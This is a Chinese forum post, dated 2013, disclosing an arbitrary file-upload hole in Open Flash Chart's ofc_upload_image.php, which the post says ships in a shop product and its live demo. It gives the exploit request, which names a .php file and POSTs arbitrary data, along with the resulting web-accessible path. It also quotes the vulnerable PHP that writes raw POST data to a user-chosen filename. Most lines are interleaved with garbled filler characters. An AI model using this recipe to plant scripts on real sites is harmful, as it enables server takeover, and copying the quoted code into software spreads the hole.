POST 数据漏洞文件执行任意后缀文件保存
8 q- T$ T; S$ q 漏洞文件/chart/php-ofc-library/ofc_upload_image.php$ K/ R; C4 Y0 X! ?* q, e5 f
; M t+ W B" N; o利用:
) f/ X$ U# Q' c( b1 [5 D/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名& f( Z/ ~+ j8 l( b4 c
2 k: A0 I" ^5 XPost任意数据: d/ J6 v$ R5 U7 D
保存位置http://localhost/chart/tmp-upload-images/hfy.php( Y. ^& L/ x, h! q! |; m
. }. C/ X( }; G* B, s8 e( I
7 z0 z( G8 p; B0 C
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~4 I. y4 T9 Y( ]( q
+ [+ u: a" O; [
<?php
) t# o! G7 O& m
4 H- ?' v7 l4 K- a( A1 }//6 i* j6 q# j# l7 C8 l4 x5 `
// In Open Flash Chart -> save_image debug mode, you
% v: B# i. o7 Z6 _// will see the 'echo' text in a new window.
) j7 a; M0 c7 l$ Z8 p/ I//
$ y1 E R1 s( Z% |. ~8 w
" k; m1 l/ p7 A/ B( B& J6 F/ h/*/ q) b3 v( F& H' K) H
' @4 u8 C# P# |. M" C+ L
print_r( $_GET );
! V1 \% o& x" g7 Xprint_r( $_POST );
5 x! r$ \" M3 D1 V9 c" Z" X9 Hprint_r( $_FILES );% ^* O6 J4 s: A7 n5 I; D
5 U2 f& I8 a I4 Z8 ^/ zprint_r( $GLOBALS );
! X+ u. X0 X+ Y! D v5 @print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
; R) z W1 K) [8 E
. _+ W! A4 O( P- C*/
# B1 m' ]3 E. G+ m+ g// default path for the image to be stored //4 x6 w9 ?# C4 q
$default_path = '../tmp-upload-images/';$ Y* Z/ g3 p3 p s
7 K8 f( z8 I9 ~/ n7 cif (!file_exists($default_path)) mkdir($default_path, 0777, true);
. i; _3 h. d$ R
+ N1 ^& x; K6 s" o7 G( d3 z// full path to the saved image including filename //
. U& t! m8 l+ M: O4 X" l+ m$destination = $default_path . basename( $_GET[ 'name' ] ); 6 j1 v4 J( ?5 E+ \+ C5 Y1 J
6 P+ O: [( {& ?+ k( i1 c" Q
echo 'Saving your image to: '. $destination;' |5 }! {3 w& ]" r/ }
// print_r( $_POST );2 H( M; q' p( K. c
// print_r( $_SERVER );& e* w3 ?8 J( y
// echo $HTTP_RAW_POST_DATA;5 L- D( s9 J! |4 B; K5 n
( t: v0 K& `% T" L# M//3 ?8 b0 t: c' T$ S! \2 U* M
// POST data is usually string data, but we are passing a RAW .png
* L Q1 |2 I* ]// so PHP is a bit confused and $_POST is empty. But it has saved, l5 o3 x8 r8 |2 y4 l
// the raw bits into $HTTP_RAW_POST_DATA2 |0 S$ v) M0 O
//* b$ L1 e# F( |/ j; f; k# o$ Z F( K
. S, B0 n& r' M5 W9 y$jfh = fopen($destination, 'w') or die("can't open file");
. r: Q2 ]4 s) w- {$ sfwrite($jfh, $HTTP_RAW_POST_DATA);
$ c% d; d# X# ~fclose($jfh);
$ H1 `* c4 ^4 M, X$ `/ i b5 z5 N! A2 K- K
//$ c# B, m( N9 N& U0 k+ o2 s' V
// LOOK:8 J Y9 @2 `+ b( u# r/ E/ Y$ d5 v
//# B( D' j8 {0 A' H8 a* e0 ~# L5 U
exit();5 m7 v3 }! X0 p2 U
//
& K7 V8 s# I! h7 c1 R- `6 p// PHP5:- d- H& |6 m& f8 D/ ?; k8 B
//3 N5 x8 ]. j0 C) i3 a: W
, @' V. K* @% V/ p
5 h8 h) d) z, y+ z// default path for the image to be stored //$ T9 ?, X# T+ ^6 L, O& |" p
$default_path = 'tmp-upload-images/';) S9 n1 I+ q9 i8 S: a L$ \
, f p2 J. @$ ?
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
! V E; ?* T) u' I1 J) Y& I2 J$ ?/ V0 }5 h( f/ ]# B
// full path to the saved image including filename //3 B) v u2 E$ c# M$ J0 T
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
" y; G( [ \3 m* n& e8 f7 N; l. K% r0 X ^ t: V
// move the image into the specified directory //3 s; _3 d8 H) F' j# h1 P+ h6 r, o2 j
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
8 ~2 V; E+ f6 L9 S$ c echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
7 ?& N8 Y, S0 a. Q2 _( v# o! P} else {8 b! g# A/ `# F1 q
echo "FILE UPLOAD FAILED";
* r% K% y$ s! {3 N4 i/ x, V}6 x2 H$ {% K4 m$ R# m/ F
6 _( g1 B! _' x5 G3 ?# N/ q. h& M5 L, ]0 {; S4 s
?>
! a, E1 s* ~* g3 s+ k$ `8 N' S$ u& f" w) J% l( e$ {" A Z
" t+ a2 ]6 o6 C7 b
" L9 D4 c# O4 K
& u4 l! a" m$ V6 i2 S( f% g
9 m3 ~4 R7 W! t: F/ G0 n6 @( V) m$ O( U
修复方案: % b$ Q c6 u/ I6 [9 D, S2 c
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
# q1 t; b d, l) } t" ?0 I, u, X2 K
. V: ~3 x6 C* w) w8 \7 H. Y ] m: ~. Z, [
" E ~' I! n( Y( `
" ^* P% w1 ~% c1 _6 r |
发表于 2013-2-23 12:38:58
收藏
支持
反对